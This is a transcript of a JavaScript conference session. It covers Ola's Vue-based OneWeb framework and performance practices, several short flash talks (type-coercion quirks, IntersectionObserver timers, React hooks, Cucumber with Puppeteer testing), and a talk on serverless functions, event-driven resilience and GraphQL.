So those were the requirements. The key points were that the framework should be small, with less abstraction and complexity. We had evaluated the other frameworks, and we liked the philosophies of Vue and Polymer; this time we chose Vue, because of the browser-support constraint. And this is how we're securing our web future: we write our code in Vue.js, in a web-component style, using single file components, and we deliver applications as traditionally compiled JS. Once browser support for web components fully arrives, we'll still be writing code the same way, and at that point we can re-evaluate: Vue (which, by the way, also supports web-component builds), Polymer, or any other web-component library. This way my development pattern doesn't change much; it's only a little syntactic sugar that individual frameworks introduce. My development style and my performance patterns all stay the same.

Now, about Vue itself: Vue is a very good framework because it was inspired by Angular, React and Polymer. It took the best of all of them and gave good defaults, including a good default build system. If you're interested in how Vue compares with your framework of choice, go to the Vue documentation and check out the comparison section: it's very well written, and you can read a lot about how Vue stacks up against other frameworks.
A single file component is a development style where the template (your HTML), the script and the style live in one file. This has a lot of benefits. It's easy to work with, because everything you need is in a single file: you don't switch between tabs, and you don't wade through a lot of complex, compiled CSS. Polymer and Vue, being web-component-style libraries, suggest that separation of concerns need not mean separation of file types: you can pack the CSS, JavaScript and template into one file and still keep separation of concerns along business-component lines. Instead of splitting file types into silos, you get a compact, single functional unit, which makes debugging easy; the best part is you can pick it up and drop it into another project.

Next, as I mentioned, our developers have to make a conscious call about how to load the assets a page needs to perform. First I load the Vue runtime, which does all of Vue's framework-level work, plus Vue Router, the client-side routing library, and Vuex, the state-management pattern. Once that's loaded, I load oneweb.js, which contains Ola-specific code and certain Ola-specific modifications particular to us. Then I load the router, the store and app.js. Once app.js is downloaded, we decide which components load next: I usually load an Ajax library, then the rest of the components required for the homepage to be functional, and then we lazy-load the rest of the application code. Loading this way means I'm making a conscious call about my critical path, and page performance comes out repeatably, out of the box; every project we do implements this.

Another feature we use from Vue is "declare first, load later", which exists in Polymer as well. Let me explain with an example. You have your root component, the top-level parent. In it you declare a component that is not needed for the critical rendering path but still has to live in the parent, because it's a reusable piece of code that child components send events to. For example, the Ola notification web component: it's used neither in the first critical rendering path nor in the user's first interaction, but it still belongs in the root component. What happens if I include it in the initial bundle? It hampers my critical rendering path. So instead I declare it in my main component but don't download it with the initial payload; I download it later, and the moment the download completes, the component activates and starts performing its functions, without any console errors in between. So on a typical day we have no framework decisions to make: when we get a new project, we clone our starter pack and start writing application logic, and we don't worry about performance, because the best performance patterns are baked into the framework. A sketch of this declare-first-load-later pattern follows.
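A minimal sketch of what "declare first, load later" looks like in Vue: the component is registered with an async factory, so it can appear in the template immediately while its code is fetched later (`OlaNotification` is an illustrative name, not necessarily Ola's actual component):

```js
// App.vue <script> section, sketched
export default {
  name: 'App',
  components: {
    // declared now, downloaded later: the bundler splits this into its own
    // chunk, and Vue only fetches it when the component is actually rendered,
    // keeping it out of the critical rendering path
    OlaNotification: () => import('./components/OlaNotification.vue'),
  },
};
```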
And we have a shared design language and component library across teams, which makes our development speed really fast over time. Initially it took some time to build critical mass: a certain amount of library code, common buttons and various other components. But once that was done, we reached a point where we deliver applications with very good turnaround times. And because we now have a unified framework across Ola, engineering folks can move across teams and contribute during a crunch. We first built a POC of this framework and tested it in production in one or two applications; once it was well proven, it saw org-wide adoption. Everyone in the customer and supply verticals, and even the internal teams' web portals, is on OneWeb now: there are 20-plus projects running OneWeb with Vue.js.

Let's look at some of the pages. The first is a single-sign-on website, powered by OneWeb inside a web view. The next screenshot is the track-ride screen: when you book a cab, you can share your ride details with your loved ones via a track-ride link, and that link is powered by OneWeb. After this, we wanted to reduce turnaround time in the Android and iOS applications, so we started using web views instead of native development for screens that are not in the critical booking flow. This one is the merchandising view, where we show the features and facilities available in a given city; it's powered entirely by web views built with OneWeb. Once we shipped this, the organization gained confidence in the web platform and we started getting more and more web views to implement. Here you can see the donation and insurance web views, which include API functionality, also implemented with OneWeb. Furthermore, we have launched new categories on both Android and iOS by building the booking flow on web first and implementing it natively afterwards. We also earned a permanent place in the Android and iOS apps for certain critical flows, like GDPR; GDPR is the data-protection regulation in Europe and the UK, and that flow is built with web views. Two-factor authentication, again a critical component, also runs in web views. Of all the integrations, the Foodpanda one was the largest in terms of scale: along with the ride categories you can see a Foodpanda icon and an information bar, and when you tap it, a full-fledged Foodpanda website loads inside the web view and you can order food within the Ola app. That was a very big project in which we built an entire website using OneWeb.

Now let's talk about performance: what are the performance metrics of OneWeb? Google's performance guidance says you can afford to send only around 130 to 150 KB of JavaScript for the median phone on the median internet connection, that is, a slow 3G connection with 400 Kbps bandwidth and 400 ms RTT on a Motorola G4. Looking at the OneWeb footprint: the common library is around 33 KB, and the lazy-loading plus Ola-specific library code is around 3 KB (all these values are gzipped), so that's around 36 KB of library files.
That leaves us a healthy 100 KB of application code to send during the critical rendering path, and that's how we ensure the performance patterns are baked in. Now some numbers from WebPageTest runs on various sites. An e-commerce PWA with out-of-the-box performance, no special effort: start render at 3.2 seconds (it used an app shell), interactive by 15 seconds, document complete (HTML fully parsed) at 40 seconds, with around 1.2 MB sent down. Next, an Ola website built on a non-OneWeb stack: start render at 12.9 seconds, interactive around 16 seconds. The Ola PWA, where we put a lot of effort into optimizing performance, had a start render of 2.4 seconds, with the other parameters also very good. And a regular OneWeb Vue PWA, with no special performance tuning or tweaking, still had a good start render of 6.4 seconds and was interactive by 10.21 seconds. So on a OneWeb website, which has different...

"Do you have any other major points of comparison? What I understand is you're asking: we chose Vue.js because of the browser-support criterion; is there anything else that made us choose Vue.js?" Yes. Vue.js components are loosely similar to Polymer components, and we believe web components are the future. Web components give you benefits because the browser can understand them; a lot of rendering benefits are granted to you when the browser knows what's going on in that HTML element. So it was that similarity.

"You did not mention the challenges. What were the challenges you faced while creating this, when you were integrating Vue into your Foodpanda app?" The Foodpanda integration was, what do you call it, an after-effect: we had already developed OneWeb, and the Foodpanda app came later. But to answer your question: first we had to understand the performance patterns for Vue.js and create a skeleton starter-kit app that replicates all the best practices, to hand to developers. So there was a certain learning curve, and there were build modifications: we wanted to stay as close as possible to a web-component development and file-distribution style, in case we move to web components tomorrow, so we had to tweak the build Vue gives you by default. We used the Vue build tooling and the Vue compiler and wrote some modifications on top of that.

"You mentioned you chose Vue.js because it draws the best from other frameworks. Is that universally applicable, irrespective of the requirements of the application, or should one weigh other considerations before going for Vue.js?" Can you repeat that?
"You mentioned that you went for Vue.js because it draws the best practices from other frameworks. Can this be applied irrespective of requirements, or should there be other considerations before going for Vue.js?" To rephrase: we chose Vue.js because it has best practices from all frameworks; is that sufficient, or do we have to re-evaluate if the requirements change? See, this is why we keep control over how we distribute our application. The practices Vue took from others are the reactive data system, unidirectional data flow, and the store; those are the framework-level best practices. The other best practices concern how files are loaded, and that's where you have scope for optimization: build optimization is one part, network optimization another. Network optimization has to be treated carefully; we chose a pattern we found satisfactory for most use cases and replicated it everywhere. We have also left flexibility in the framework, so a developer can deviate from the given best practices if he needs to. For example, in one project the bundling was different from all the other OneWeb projects. We haven't imposed an extremely strict guideline that leaves developers no room to evaluate their own needs. So with OneWeb, as designed, I implement the best practices that exist, and if a better practice for distributing files comes along, that option is available. And in terms of framework-level components, if new components appear, OneWeb picks them up and they become available to us as well.

"Hey, is this OneWeb framework open source, or are you planning to open-source it?" It is under consideration.

"Hi, thank you for your presentation. You said that with OneWeb you could essentially break the mythical man-month paradox. But how much time did it take you to develop the framework in the first place?" I think it was around a month, less than a month of effort. We were around eight engineers, and we already had past experience in web performance tuning, so we were able to get it out. Actually, I think it was around two weeks of core work: one week of discussion and about one week writing the build system, and the third and fourth weeks went into writing a POC application and checking its performance metrics.

"Hi. I've worked on React and Angular, Angular 2 and above. The things you describe, a web-component-driven project and unidirectional data flow, can be done in both of those. I've never worked with Vue; I know its pros and cons only from theoretical, bookish knowledge. How is it better, and what improvements does it make? From your personal experience on this OneWeb project, what's your take on this particular framework?"
"How is it different in terms of real exposure and experience? If one has to start a new web project, why should one consider Vue over React or Angular?" To repeat the question: he's using Angular 4 and React, knows them well, and they also have some of the features mentioned here; so if he starts a new project, what is the difference in learning curve, and why adopt Vue? First, you need to see who your target audience is, who your consumers are. Is your traffic going to be heavily mobile-first? If so, you need a framework that fits the budget I mentioned: you have about 130 to 150 KB of JavaScript to send, and you need room for application code, so you cannot send 150 KB of libraries and then ship another 100 or 200 KB of application code on top. Evaluate that parameter first. Next, consider developer experience: some people like JSX, some like TypeScript, some like raw HTML, CSS and JavaScript. It also depends on your development speed, the sort of engineers you have, whether you have time for performance tuning, or whether slightly lower performance is acceptable as long as it works well out of the box. You'll have to build your own decision matrix; I wouldn't say only this framework is good or that one is, so come up with a matrix and decide on it. What stays the same is your development philosophy: the way we distribute code is based on well-researched performance guidelines, and that wouldn't change for me. As for Vue.js itself and how easy it is to adopt: it gives a lot of healthy defaults, so you don't have to think a lot. With Angular or React, the one non-functional difference I'd point out is that you need to know and understand quite a bit before jumping in, whereas Vue's healthy defaults give you a decent amount of web performance right away. Vue is also a progressive framework: for a single category-launch page where I drop in a few small components, I use Vue, and for a large-scale application I still use Vue. It's a versatile framework that scales well with varying needs. "Excuse me, how can we bring in CSS preprocessors, like Sass or Less, with single file components?" Sorry, we're out of time; the speaker will be available offline, you can continue there. Okay, let's thank him. Thank you.

Okay, so we're starting the flash talks. Simple rule: five minutes per speaker, and you can do what you want. Our first speaker is Riyaz; I'm not introducing the topic, let that be a surprise. I wasn't sure whether this is called a flash talk or a lightning talk, so I have both on the screen; take your pick. My name is Riyaz. I head the offensive security team at Appsecco; essentially, my team hacks into apps and servers hosted on the cloud and such. That's our blog.
That's my Twitter, and that's the company Twitter. Because I have five minutes, I'll go straight to the topic: go home JavaScript, you're drunk. I'm not a developer; my role at the organization, and all my experience, is in breaking stuff. So let's see what I'm talking about. This is going to be interactive, and since all of you are developers, I need answers from you folks. JavaScript has five essential types, right: strings, booleans, numbers, objects and arrays. Let's start with numbers. If I have 2 + 4, what do you get? Six; everybody says six. If I have 2 - 4? Minus two. Okay. Now NaN, "not a number", which according to the ECMAScript spec belongs to the number category: NaN - 2, what do I get? NaN. 2 - NaN? NaN. NaN - Infinity, Infinity also being a number? NaN. And -Infinity + NaN? NaN. Okay, numbers are clear; let's move to strings. I have the string "abc" and I add an object to it: "[object Object]". I do the same but change the order of the operands, and by now you'll have realized the answer is not what you'd compute: you get zero, which is obviously the expected answer. Now most of us, even in the security community, are very familiar with alert(0): it's the common POC used to show that you have XSS in an app. And because JavaScript can be coerced into computing strings like these, literally character by character, you can build the whole payload out of nothing but such expressions; I'll just type the whole thing out and copy it across... I have 10 seconds left. I should have submitted this as a full talk, shouldn't I? What do you think this is? It says alert(0), and I can choose to evaluate it.

Okay. We also have a BOF session on Vue.js starting in about five minutes outside; it's a continuation, so anything related to Vue.js that you couldn't ask here, you can ask there. Next up we have Ashish.

Hello, hi guys. So I have a very simple use case that we solved; we were just coding and I came across it, and since it's a flash talk and I have only five minutes, I wanted to discuss it. I'll show you what it's about. Okay, how much time is left? Where did my browser go? What is happening? One second, I'm not able to project this; I'll duplicate the display. I'm really sorry about that. Okay. So this is the kind of use case we were solving. We were building this widget, a pretty common one on e-commerce websites, where multiple countdown timers are running. A naive approach is to just use setInterval, with multiple intervals running. The problem is that if I have around 20 products and 20 timers for them, there will be multiple callbacks firing every second, and multiple layouts and paints within each second for the browser to handle. That's too much for the browser to render within its 16-millisecond frame budget. So yes, the performance does matter.
And especially now that we have released a PWA, we really need to focus on achieving 60 FPS. So what's the solution? How do we manage so many timers, and these can go up to 40 or 50, running at the same time? The solution is simple: the IntersectionObserver API, newly available in Chrome, and that's what we used. I'll quickly show you what's happening here. If you watch the timer, it reads 11:37; when I scroll it out of the viewport, all the timers stop. Only the timer currently in the viewport keeps running. When I go back, it updates: it jumps 10 seconds, because it didn't run during that interval. Since only the timers in the viewport run, I can have thousands of timers and still hold 60 FPS. These are the small things we need to take care of, especially now that the web has to match the performance of native apps and PWAs are everywhere. If you don't use IntersectionObserver here, the FPS drops to around 5 to 10. So that's the use case I wanted to share with you.

Okay, next, an ultimate flash talk by Siddharth. Is it already on? But now you can't see anything. Here's a free startup idea: make a projector that just connects and works. Sweet, finally. Everything's super small, so I'm going to bump it up, and I'm going to put five minutes on the clock for myself. Who here uses React.js? A quick raise of hands. Awesome, most people. It's not a JavaScript conference unless we talk about React, right? And nobody did until the last slot, so I'm like, cool, let me be that guy. How many people don't work with React, any other-framework folks? Awesome. So I'm going to try to teach you React super fast, in two ways, and one of them is going to suck and one of them is going to be really good. There's something the React team launched just yesterday, and I'm quickly going to show you what it is. The idea is: I hate classes, and I don't want to write a single class ever again; this makes that possible. Okay, I have this number-badge thing, a plus/minus counter. It doesn't really work yet, because you have to write code to make it work, so feel free to shout at me while I make mistakes. How do you actually make it work? State. Cool: to use state, I need to convert this into a class component. I hate class components, but I need them. So I do that, and then I need a render function: I do a return, copy this gibberish in, delete the old bit, and hopefully it still works. Awesome. Then you need a constructor, so that you can declare state; I declare an initial state of count: 0, and something broke already. Can you even tell me why? super(), yes, which I shall never remember in my life. Now I can delete the hard-coded zero and put this.state.count. That's cool. Now I need functions to add and subtract. So I write add, where I set state so that count is this.state.count plus one; I'm already tired. Subtract is the same, copied, with minus one. Awesome. And now I can say onClick is this.add on one button, and this.subtract on the other. So this is how you build a counter component; roughly, it's the sketch below.
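A reconstruction of roughly where Siddharth's class version ends up, including the arrow-function class fields he switches to a moment later to fix the `this` binding (`NumberBadge` is an illustrative name):

```jsx
import React from 'react';

class NumberBadge extends React.Component {
  constructor(props) {
    super(props);                 // forget super() and the constructor breaks
    this.state = { count: 0 };
  }

  // arrow-function class fields keep `this` bound without .bind(this)
  add = () => this.setState({ count: this.state.count + 1 });
  subtract = () => this.setState({ count: this.state.count - 1 });

  render() {
    return (
      <div>
        <button onClick={this.subtract}>-</button>
        <span>{this.state.count}</span>
        <button onClick={this.add}>+</button>
      </div>
    );
  }
}
```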
This is like the hello world of handling state, of handling data. So you click plus one, and it breaks. Oh God. Yeah: you can .bind(this), which is stupid, or you can use these fancy arrow-function class fields. Awesome, those work. I run a lot of beginner React workshops, and imagine explaining what a constructor is, why you need super, what binding is, what `this` is. Explaining all that to people is super hard; I basically hate classes because I have to teach people classes. So I'm going to discard all of my changes, and we're back to a simple function that doesn't work. Now, they launched a new feature yesterday: a bunch of hooks called useState, useEffect, use-whatever. Here's how useState works: inside your function component, you don't need a class to have state anymore. You call useState and give it a default value, like zero, and it gives you two things: a value and a setter for that value. I'll call them count and setCount. Now I have state in my application, and I can change the hard-coded zero to count. Then I write the add function: add says setCount(count + 1). That makes sense. And subtract is setCount(count - 1). Now I can use add over here, onClick add, and on the other one, onClick subtract. And it works. So you can have state inside a function component and it looks super pretty: no this, no constructor, no super, none of that bullshit. It's super easy, I can confidently teach it to people, and it won't be a pain. Now you're thinking: nobody writes code like this anymore, come back from 2005, everyone's doing Redux and reducers now. Cool, so I have a reducer over here, and I'm going to use useReducer, which is also a state hook. In my component I say const [state, dispatch] = useReducer(reducer, initialState), passing the reducer and an initial state, which for me is count: 0. Then I use state.count, and instead of add I write a function that dispatches an action, and the same for subtract. So you can have reducers, and they still work with all this; both versions are sketched below. Go to reactjs.org and look up the hooks intro; it's a huge, awesome thing. You'll probably never have to write a class again; I'm mostly not going to. Also, I'm out of time, so thank you.
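For reference, the hooks versions of the same counter that Siddharth sketches above might look like this; the reducer's action shape is illustrative:

```jsx
import React, { useState, useReducer } from 'react';

// useState version: no class, no constructor, no binding
function NumberBadge() {
  const [count, setCount] = useState(0);
  return (
    <div>
      <button onClick={() => setCount(count - 1)}>-</button>
      <span>{count}</span>
      <button onClick={() => setCount(count + 1)}>+</button>
    </div>
  );
}

// useReducer version: the same counter, redux-style
function reducer(state, action) {
  switch (action.type) {
    case 'add':      return { count: state.count + 1 };
    case 'subtract': return { count: state.count - 1 };
    default:         return state;
  }
}

function NumberBadgeWithReducer() {
  const [state, dispatch] = useReducer(reducer, { count: 0 });
  return (
    <div>
      <button onClick={() => dispatch({ type: 'subtract' })}>-</button>
      <span>{state.count}</span>
      <button onClick={() => dispatch({ type: 'add' })}>+</button>
    </div>
  );
}
```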
Okay, our next flash talk is from our MC, Nitesh. He wants to talk about the types of people you meet at conferences, so let's give him a round of applause while he sets up. So, perks of being an MC: you get to do this. I'm going to talk about types; not the types we use in code, but the types of people you end up meeting at a conference. We've had a lot of tech talks today, so this is more of a people talk. Over the last few years of attending, I've sort of categorized people; no offense meant to anyone. The first category are the Intrigued: the people who come for the first time and get to learn a lot from the speakers. The thing to realize is that if there are people talking up here, you can also be one of them. If they're implementing something at their company, you have probably done it too, but these folks are the ones on stage. First-time speakers are often scared of stage fright, of all the people who will be there; you can get rid of that. You're in Bangalore: there are meetups for almost every language and framework, all of them have Twitter handles and contacts, so get started with one of those. The next category is what I call the Gyan Baba: people who will give you an opinion on everything, even when you haven't asked for it. You will meet people like that, and when I first started speaking, it was very intimidating. So, for the gyanis out there: if you think a speaker has made a mistake, or hasn't stuck to your favorite architectural design patterns, rather than questioning him, counter-questioning, and counter-questioning again from the floor, maybe meet him outside and have a healthier discussion. It's a lot better, and it gives first-time speakers more confidence. Next, my personal favorite and the category I belong to: the Trick-or-Treaters, the folks who come for the stickers, the t-shirts, all the good stuff outside; the cupcakes today too, which were very nice. After that, the Godfather: the people who want you to work for them, telling you "hey, we're doing this thing, maybe you can work for us." You'll find them outside as well; if you're planning a career change, it's a good time. Another one: you'll always find the Manager, who, while discussing something, quietly slips in that he's the engineering manager of some team somewhere, leading something, hoping you've caught on; many times you don't. And then my favorite, the one I think many of you might be in as well: Work From Home. Everyone's put that in their office status today or something, and they're over here. It's a nice escape route: it's a Friday, so you get a long weekend. That's about it, short and sweet. My name is Nitesh, that's my Twitter handle, and I do a lot of ranting on Twitter, to end on that note.

Nice. Okay, we have time for one more flash talk. Hey, just give me a sec. Yeah. So, my talk is about an integration test that I wrote with Cucumber.js and Puppeteer. Let me quickly introduce these terms. Cucumber is mainly a simple collaboration tool. What it looks like is this: imagine you have a login feature. Your product manager comes and tells you to build login. How do they describe it? Something like: as a registered user, I log in with some ID and password, and I get redirected; that's my login flow. Or take Google search: you search for something, and you should land on the results page. It's a very natural-language way of writing your features. Now, what I do is convert them directly into code: I take this and put it into my code base, and you can see it right there, the login.feature file.
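A minimal sketch of what such a feature and its step definitions might look like with cucumber-js and Puppeteer; the URL, selectors and step wording here are illustrative, not the speaker's actual files:

```js
// login.feature (Gherkin), sketched:
//   Feature: Login
//     Scenario: Registered user logs in
//       Given I am on "https://example.com/login"
//       When I log in with "user@example.com" and "secret"
//       Then I should be on the "/dashboard" page

const { Given, When, Then, Before, After } = require('@cucumber/cucumber');
const puppeteer = require('puppeteer');
const assert = require('assert');

let browser, page;

Before(async () => {
  browser = await puppeteer.launch();                  // headless Chrome, driven by the test
  page = await browser.newPage();
});

Given('I am on {string}', async url => {
  await page.goto(url);
  await page.waitForSelector('input[name=email]');     // wait for the input box to appear
});

When('I log in with {string} and {string}', async (email, password) => {
  await page.type('input[name=email]', email);         // enter some text in the inputs
  await page.type('input[name=password]', password);
  await Promise.all([page.waitForNavigation(), page.click('button[type=submit]')]);
});

Then('I should be on the {string} page', async path => {
  assert(page.url().includes(path));                   // here we only assert on the URL
});

After(async () => {
  await browser.close();
});
```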
So it shows you the same text, written in a few proper lines with the keywords Given, When and Then, and what it converts into in the end is this. "Given I'm on Google.com": you launch a Chrome environment. This is something I use called Puppeteer, which is made by the Chrome team. You go to the page, which you define here as Google.com, wait for an input box, and enter some text into it. Let me show you an actual live example running; this is a quick video I made of it. So this runs the test and shows you: it opens Chrome, and this is happening on its own, the Chrome instance is controlled by automated software, as you can see. It goes to the website, waits for the input box to appear, enters the text, clicks the login button, lands on the URL, asserts that the URL is correct, and exits. As you can see, it all happens rather quickly. The test failed here for some reason; we'll have to investigate. But what I've done, basically, is this: I have an input selector, I use CSS to select it, I enter some text, I expect the page to navigate, and at the end I expect the URL to contain this. So all I'm testing right now is the URL, but you can do any kind of test: any part of the page, any CSS. What lets you do this is two things, Cucumber and Puppeteer. Puppeteer is a headless environment that runs in Node, so you can integrate this whole thing into your CI pipeline. If a test breaks, you can have it take a screenshot, tell you what exactly broke, and show a diff between two screenshots: what the page should look like and what it actually looks like right now. So on every release you can run this in your pipeline and make sure nothing breaks visually, not just in your unit tests. This is how we write integration tests at the place I work, a company called Locus. One more quick thing: Puppeteer also lets you capture metrics, performance numbers, network calls; you can even test your APIs directly with it. It's a very quick tool; I put this together in a couple of days, so it doesn't take long to implement, and it's very useful for your pipeline. That's all, thank you.

Thanks, Kalash. So, our next speaker is a polyglot and he loves cooking. So far we have seen a lot of front-end content, OneWeb, security and so on, and you might be wondering how the back end gets built these days; there's GraphQL, serverless, and all the ES6 features in the Node back end too. So let's see how we can develop scalable Node.js applications on the back end. Shahid.

I'm Shahid. I work at Hasura, and I tend to shamelessly plug my Twitter handle everywhere I go, so please follow me if you like what you see today; I'll be writing more about these things. Cool. I work for a company called Hasura; most of you might have got Hasura stickers and be wondering what it's about, and I'll come to that towards the end. I'd like to start the talk by introducing a problem, something everybody will have seen at some point in their life. Before that, can I see how many front-end developers are here? Just raise your hands. Okay, awesome.
Back-end developers? Cool. Is there any other category of developers here that I'm not aware of? Full stack; okay, who is full stack? GraphQL stack, JAMstack, there are a lot of stacks out there. Any GraphQL users here? Serverless functions, functions-as-a-service? Awesome. Most of this might be new for a lot of you, but that's the whole point, right? Cool. So let's see how a typical application is built. You have a mobile app or a website or something of that sort, and it contacts an API layer, which talks to a database, which in turn talks to multiple other microservices. Or, as always, there's the monolith, where everything lives inside one service; I'm not going into that, because hey, we're in 2018, and monoliths are what, the 1990s maybe? Anyway. So you have these microservices talking to each other, and this particular set of microservices I'm introducing here will be used throughout the talk, so keep them in mind. You might have guessed already what this application does: it lets you order food. So, any thoughts on what kind of issues this architecture can have? I'll give you a clue: two of them are in the title of the talk. Any random shout-outs? Yeah, scalability and resiliency; but why? Why is it not scalable? I'm assuming it's implemented in a naive way; of course you can make this scalable, all of us can, but I'm talking about the naive approach, where you make a request from the application, it hits the API layer, and the API layer does everything that has to be done. In this case it makes an insert into the database, validates the order, processes the payment, and assigns a delivery agent, and only after doing everything does it return to the client. This is a synchronous action: you do something in the client application, it goes through the entire flow on the back end, and then it comes back to you. That scenario, in particular, does not scale. Do we all agree that synchronous actions are inherently hard to scale, that you can't run thousands of them at once unless you allocate the required resources? We agree? Anybody disagree? Either none of you have very strong opinions, or you're all enjoying a nice post-lunch nap; which one is it? Okay, anyway. Resiliency, meanwhile, is something you have to build into the application yourself. What happens if your interaction with the restaurant microservice fails, if that microservice crashes? How do you restart the process from the point where it failed? This is something you typically build into the app; you write code to do it. Now, when you see that most of your issues come from synchronous things happening in the back end, what is the golden hammer that comes to mind? Let's make it async, right? So let's see what an asynchronous architecture looks like. You have the API layer again, you have the database, and you make, say, an insert into the database. You have something like an event system: you keep inserting events, other microservices consume those events, and they process what needs to be done. Most of you are familiar with this architecture, right? Yes? Okay, awesome. Cool. For contrast, a sketch of the naive synchronous flow we started from is below.
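A sketch of that naive synchronous order flow as an Express handler; the `db` and service objects are illustrative stand-ins, not a real API:

```js
const express = require('express');
const app = express();
app.use(express.json());

// illustrative stand-ins for the database and the three microservices
const db = { insertOrder: async body => ({ id: Date.now(), ...body }) };
const restaurantService = { validate: async order => true };
const paymentService = { charge: async order => true };
const deliveryService = { assignAgent: async order => true };

// naive synchronous endpoint: the client waits for every step
app.post('/order', async (req, res) => {
  const order = await db.insertOrder(req.body);   // 1. insert into the database
  await restaurantService.validate(order);        // 2. restaurant validates the order
  await paymentService.charge(order);             // 3. process the payment
  await deliveryService.assignAgent(order);       // 4. assign a delivery agent
  // only after every step succeeds does the client hear back; if any service
  // crashes mid-way, resuming from that step is bespoke code you write yourself
  res.json({ status: 'completed', orderId: order.id });
});

app.listen(3000);
```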
So this is the typical async architecture: you interact with the database, your state is stored in the database, and you execute actions based on events happening on the database. Nice. But microservices are, again, like the monolith — so 2000s, right? Maybe so last year. What's this about serverless? Let's talk about serverless a little. My aim is to replace my microservices with serverless functions so that I don't have to take care of a lot of things. I saw there are very few serverless — functions-as-a-service — users here, so let me introduce what serverless lets you do. Typically, when you need to write a web service — an API that says hello world — this is my Express code for that. You'd write this function, then something like app.use or app.listen, and you'd run it on a typical VM with PM2, Node, whatever, and build everything around it. Or, if you're fancy enough, make it a container — docker build, docker push — and maybe put it on Kubernetes. What serverless functions — serverless frameworks, serverless platforms — let you do is this: you have a command-line tool or a UI where you paste this function, or you run one command that takes this function, sitting in a single index.js file, and gives you an endpoint to trigger it. It gives me this URL, I call the URL, and I get the response. It's scalable by default — by nature — because you're not managing any CPU, RAM, or anything. There's no ops: you didn't deploy onto a box, you didn't SSH into any VM, you didn't create any servers, you didn't think about CPU or memory, and it just works. There's no VM to manage and no need to worry about scaling — all serverless platforms are scalable by default. Just look at the pricing page: free for a million invocations a month — that by itself sounds like scale, right? You can trigger it as many times as you want, concurrently — once, twice, or ten times at once. Scale for free. Most of the cloud platforms — AWS Lambda, Google Cloud Functions, Azure Functions — have a very generous free tier, around a million invocations per month. So this is freedom. Most of us here are front-end or full-stack developers: I just want an API to be available for my app to work. I know exactly what it does; I don't want the hassle of creating a VM and deploying to it. I know how to write that function — I just want this code running somewhere so I can trigger it with an API call.
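As a sketch of what that "one file, one endpoint" idea looks like — assuming Google Cloud Functions' HTTP-trigger style, where the platform hands your exported function Express-style req/res objects; the function name is illustrative:

```js
// index.js — the entire deployable unit. No app.listen, no server, no VM.
// Deployed with something like:
//   gcloud functions deploy helloWorld --runtime nodejs8 --trigger-http
exports.helloWorld = (req, res) => {
  res.send('hello world');
};
```

The platform returns a URL for the function, and every concern below that line — processes, scaling, machines — disappears from your side.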
But is it resilient? We talked about scalability — what if some serverless function fails? How do I restart the same action, how do I trigger it again? Serverless functions by themselves are not resilient. What you have to do is throw some notion of state into the mix, because the functions themselves are ephemeral — they hold no state. So you store your state in the database: in the earlier case, you store "payment done or not done" in the database, and whenever something changes in your state, you trigger events — you trigger the serverless functions on these database events. What that means is: when you have this event system, you trigger the serverless functions on those events, and you add retries to the mix, you get resiliency. Let me explain with an example. We have this food-ordering app, and this is the schema — this is what your order table looks like — and now you create a new order; this is the state. There are four steps here, which is very important: is_validated, where the restaurant does the validation; then is_paid, is_approved, and is_agent_assigned. Let's look at the flow in the serverless architecture. A new order is placed; now this is the database state — everything is false. This particular database state triggers an event, which triggers a serverless function, which does whatever logic is needed to validate the order. It does the work, comes back, and updates the database. That update — is_validated flipping to true — triggers another serverless function, which again comes back and updates the state, and so on across all the steps. Finally, when everything is true, your order is completed. Your client just placed an order — that's all — and what happened is you replaced your earlier synchronous microservices architecture with serverless functions. Your microservices become serverless functions; serverless functions are asynchronous and scalable by nature; and when you trigger them from database events, you get resiliency. But what is the cost? You don't get anything for free. The event system I talked about isn't something lying around on the road that you can pick up off the shelf, right? What you did was move the specific failure-handling logic from your API layer into another, generic failure-handling system — the event system. The cost of this asynchronous architecture is that you need a generic event system that can trigger microservices, serverless functions, webhooks — some logic — when database state changes, and you need asynchronous serverless functions. So we took this architecture, took its synchronous portion, and made it asynchronous. Again, what's the catch? There's still a problem. Earlier, your client placed an order and got an update back when the order was completed. Now everything happens on the back end: you get a response immediately when you place the order — you make a database insert, you get a response back — but how does the client know whether the order was validated or approved? How do you send these asynchronous things happening on the back end to the front end?
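To make one step of that pipeline concrete, here is a minimal sketch under assumed names — a hypothetical event payload carrying the changed row, a hypothetical `db` query helper, and placeholder validation logic; none of this is the demo's actual code:

```js
// validateOrder.js — one step in the order pipeline (all names illustrative).
const db = require('./db'); // hypothetical thin wrapper over the database

// Placeholder for the real restaurant validation call.
async function restaurantCanFulfil(order) {
  return true;
}

// The event system invokes this with the freshly inserted order row.
exports.validateOrder = async (event) => {
  const order = event.data.new;
  const ok = await restaurantCanFulfil(order);
  // Writing the result back flips is_validated, which emits the next
  // database event and triggers the payment function — no direct coupling
  // between the steps, and a failed delivery can simply be retried.
  await db.query('UPDATE orders SET is_validated = $1 WHERE id = $2', [
    ok,
    order.id,
  ]);
};
```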
So, GraphQL is the new person in town. Very few of you knew GraphQL, so I'll give a small intro. In a typical REST scenario you have endpoints to which you do GET, POST, PATCH — all these methods — and you get a response back. If there's a product and you only want the name of the product and nothing else, the back end has to implement something like a columns=name query parameter, or something similar. With GraphQL, the query looks like what's on the right-hand side: you write something called a query, you say exactly what you want, and you get back exactly what you asked for. And if you want to query across multiple relationships in the database, you nest them inside the same object and get that response back. How many of you are React developers? Angular? What are the rest of you — Vue.js? How many? Still jQuery, huh? It's almost 2019. So React — and all these modern UI frameworks — have a component-based architecture: you write a component, you use it everywhere, you reuse it. Say you have a profile component. You need the user's name, a link to a profile picture, and, let's say, the user's location — three things needed to render it. You can write a specific GraphQL query that fetches only that information — the name, the image link, and the location — wire it up to the component, and that's it; your library takes care of everything else. You don't have to take a REST response and transform it into what your component's state wants — all of that goes away. And how many times has it happened that you're working on a UI component, you want one more field from the back end, and you have to call the back-end developer? They're sleeping, or "I'm on vacation, I'm on leave, I'll do it as soon as I'm back," and your work is put on hold. All those back-end/front-end negotiations go away, because there's one endpoint exposing everything — everything that's allowed to be exposed, of course — and the front end decides exactly what to query. This kind of puts the UI first: you decide what your application needs to show on the front end, and based on that you do the database modeling, or write the right query to get the correct information.
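A minimal sketch of the query shapes being described, written as gql template strings the way most JavaScript clients consume them — the field names here are illustrative, not a real schema:

```js
import gql from 'graphql-tag';

// Ask for exactly what the component needs; nothing else comes back.
const PROFILE_QUERY = gql`
  query Profile {
    user {
      name
      avatar_url
      location
    }
  }
`;

// Relationships nest inside one query instead of a second round trip.
const PRODUCT_QUERY = gql`
  query {
    product {
      name
      reviews {
        rating
      }
    }
  }
`;
```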
